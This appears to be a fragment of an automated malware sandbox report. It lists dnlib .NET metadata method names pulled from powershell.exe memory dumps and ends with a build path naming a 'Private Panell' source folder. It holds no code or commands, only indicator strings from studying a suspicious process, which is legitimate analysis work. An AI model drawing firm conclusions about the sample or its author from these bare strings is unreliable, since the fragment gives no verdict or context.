                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMemberRefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeRefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParent source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.ApplyEditAndContinue source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.Current source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineModuleRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNameFromToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteFieldMarshal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindField source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembers source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteClassLayout source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.IsValidToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Merge source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMemberRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetParamProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetParamProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetSaveSize source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResetEnum source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumProperties source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMembersWithName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetCustomAttributeValue source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineCustomAttribute source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodImpls source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineEvent source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeByName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethod source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.TranslateSigWithScope source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineUserString source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.Save source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeSpecFromToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPermissionSetProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNativeCallConvFromSig source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CountEnum source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethodSemantics source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFields source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMethods source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeRefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetSigFromToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumTypeSpecs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.CloseEnum source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleRefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToMemory source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineTypeRefByName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetScopeProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMember source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPropertyProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumParams source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.MergeEnd source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetEventProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumCustomAttributes source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumModuleRefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: System.Collections.Generic.IEnumerator<dnlib.DotNet.Pdb.PdbScope>.get_Current source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetCustomAttributeProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetFieldProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineParam source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeleteToken source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetClassLayout source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineNestedType source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUnresolvedMethods source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumPermissionSets source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Managed source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: +dnlib.DotNet.Pdb.PdbWriter+<GetScopes>d__17 source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetRVA source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetModuleFromScope source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMethodImpl source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineSecurityAttributeSet source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetClassLayout source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineMemberRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPermissionSetProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetTypeDefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefineProperty source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldRVA source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindTypeDefByName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetModuleProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumFieldsWithName source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumMemberRefs source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.ResolveTypeRef source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SaveToStream source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetMethodSemantics source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetTypeDefProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.FindMethod source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetNestedClassProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DeletePinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.GetTokenFromTypeSpec source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodImplFlags source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetPinvokeMap source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumSignatures source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetFieldMarshal source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.EnumUserStrings source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetRVA source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.DefinePermissionSet source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataEmit.SetMethodProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetPropertyProps source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: dnlib.DotNet.Pdb.Dss.IMetaDataImport.GetUserString source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
                  Source: Binary string: D:\New Private Panell Src 3.0\Rump Updated FIX C#\src\obj\Debug\dnlib.pdb source: powershell.exe, 0000000C.00000002.442157043.0000000006400000.00000004.08000000.00040000.00000000.sdmp, powershell.exe, 0000000C.00000002.439632807.0000000003389000.00000004.00000800.00020000.00000000.sdmp
